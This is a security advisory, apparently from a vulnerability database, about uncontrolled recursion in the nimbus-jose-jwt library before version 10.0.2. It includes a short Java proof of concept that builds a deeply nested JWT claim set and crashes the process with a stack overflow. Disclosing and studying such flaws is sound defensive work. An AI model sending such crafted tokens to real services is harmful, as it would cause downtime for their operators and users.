Uncontrolled Recursion Affecting com.nimbusds:nimbus-jose-jwt package, versions [,10.0.2)

com.nimbusds:nimbus-jose-jwt is a library for JSON Web Tokens (JWT)

Affected versions of this package are vulnerable to Uncontrolled Recursion due to the improper handling JWT claim sets containing deeply nested JSON objects. An attacker can cause application downtime or resource exhaustion by submitting a specially crafted JWT with excessive nesting.

Note:

This issue only affects nimbus-jose-jwt, not Gson because the Connect2id product could have checked the JSON object nesting depth, regardless of what limits (if any) were imposed by Gson.

import com.nimbusds.jwt.JWTClaimsSet;
import java.text.ParseException;
import java.util.HashMap;
import java.util.Map;

public class Test {
    // This builds a claimset with a deeply nested map, which could theoretically be supplied by a client.
    // If the JWT is serialized into JSON (for example, in logging or debugging), it can cause a StackOverflowError.
    public static void main(String[] args) throws ParseException {        
        Map<String, Object> nestedMap = new HashMap<>();
        Map<String, Object> currentLevel = nestedMap;

        for (int i = 0; i < 5000; i++) {
            Map<String, Object> nextLevel = new HashMap<>();
            currentLevel.put("", nextLevel);
            currentLevel = nextLevel;
        }

        JWTClaimsSet claimSet = JWTClaimsSet.parse(nestedMap);

        // This will cause a StackOverflowError due to excessive recursion in GSON's serialization
        claimSet.toString();
    }
}

• Bitbucket Commit
• Bitbucket Issue
• GitHub Commit